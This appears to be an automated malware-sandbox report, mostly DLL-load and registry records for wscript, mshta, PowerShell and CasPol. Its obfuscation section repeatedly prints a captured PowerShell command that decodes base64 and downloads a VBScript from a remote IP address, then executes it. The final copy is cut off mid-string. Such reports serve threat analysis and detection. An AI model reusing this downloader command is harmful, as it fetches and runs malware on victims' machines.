                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $.NET CLR 3.5.30729.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Bn source: powershell.exe, 00000003.00000002.2235367195.000000000803B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q:C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.pdb source: powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: system.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotne
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb